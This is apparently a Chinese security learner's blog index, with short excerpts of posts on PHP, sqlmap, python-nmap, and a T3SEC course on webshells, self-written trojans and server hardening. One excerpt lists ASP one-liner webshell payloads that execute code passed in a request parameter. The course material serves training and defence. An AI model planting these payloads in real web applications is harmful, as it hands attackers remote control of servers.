方·圆--方寸之间 丨 博客

PHP学习笔记(谨此记录,以督促自己!)一.PHP魔术变量 PHP向它运行的任何脚本提供了大量的预定义常量,但很多常量都是由不同的库定义的,只有在加载了这些库才会出现,或者动态加载后,或者编译时已经包括进去了.有八个魔术常量他们的值随着他们在代码中的位置改变而改变. _LINE _ 文件中当前行 ...

T3SEC总结 主题:揭秘黑客如何通过木马控制目标服务器-webshell学习前需要了解的内容: 1.了解web的基础的原理(http协议…) 2.对安全工具有一定的了解(burpsuite.中国菜刀等) 靶机:upload-labs webshell是什么:其实就是一个网页木马 分 ...

SQLMAP指令

T3SEC —–第十三讲:python-nmap <%eval request("c")%><%execute request("c")%><%execute(request("c"))%><%ExecuteGlobal request( ...

T3SEC —–第十三讲:python-nmap Nmap–扫描网上电脑开放的连接端口 可用于评估系统漏洞 案例前提条件: python基础 pip TCP/IP Python 3.7.x python-nmap portscanner() —扫描 portscanner ...

网上找好了好久才知道是系统不同的问题,我这里是windows10File "D:\python38\lib\site-packages\tornado\tcpserver.py", line 244, in start self.add_sock ...

T3SEC —–第十三讲:webshell webshell,截屏远程控制利器技术分解: webspp:web应用 http:80/https:443/ws:80/wss:443 通信协议: http(https)/tcp/udp/ws(wss) cmd/shell等 html/cs ...

T3SEC —–第十二讲:阻网小军刀 实战自编阻网小军刀/木马/蠕虫 岗位: 等保测评-网络安全,系统安全,web渗透工具.对数据库,网络等的渗透攻防 安全运维-网络系统维护,保护防止黑客攻击. 网络安全,系统安全 web渗透,渗透实战 渗透测试-模拟黑客攻击,挖掘漏洞,隐患 并提出意见 ...

T3SEC —–第十一讲:自编木马实战 自编 进入环境后可不依赖其他工具 自编远程控制电脑木马涉及知识或技术:操作系统 win/linux/unix/android …….. 命令,服务,特性. 网络协议 osi七层网络 tcp/ip 协议族群 应用层 传输层:tcp/udp 网络层 ...

T3SEC —–第十讲:服务器安全加固 长城网络靶场竞技系统实验吧ctf训练营各体系路线 1.网络安全:协议分析,企业网络安全架构设计项目实战 2.系统安全:系统加固,入侵排查,应急响应 3.web安全编程:http,php,java,数据库安全 4.web渗透工具:工具,SRC，漏洞挖 ...